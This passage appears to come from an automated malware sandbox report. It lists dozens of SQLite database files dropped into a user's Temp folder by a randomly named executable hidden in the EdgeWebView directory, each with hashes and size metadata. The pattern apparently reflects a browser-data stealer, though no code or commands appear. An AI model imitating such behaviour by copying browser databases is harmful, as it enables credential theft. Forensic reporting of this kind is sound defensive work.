                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\IRz6wh8qmO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\J270ElRwiI

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\JLosvo5bwt

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\JVDczSfYrt

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Jl8VmHsM7Y

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\JnCTO7Bjix

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\JyX0OYQy40

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\KARNEHxrp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\KjRYudvAwE

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\KrzDi8gHjX

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\KxbRJxa72M

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\LaW1PuA6gJ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):114688
                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\LaeaKjdSTZ

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\Lhpc6f5CLO

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\LjIuCyWc2F

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\LtX2Bww1Vt

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):28672
                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\M5dedTdAyM

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40960
                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\M8c8NncKsS

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5712781801655107
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                          MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\MFqn1Wmi6a

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):106496
                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\MIXoKdQtO7

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):49152
                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\MjJuhXLqRK

                                                                                                                          Download File
                                                                                                                          Process:C:\Program Files (x86)\Microsoft\EdgeWebView\Application\rCdgcwByUDmMcQzYkDZywyWr.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):20480
                                                                                                                          Entropy (8bit):0.5707520969659783
                                                                                                                          Encrypted:false
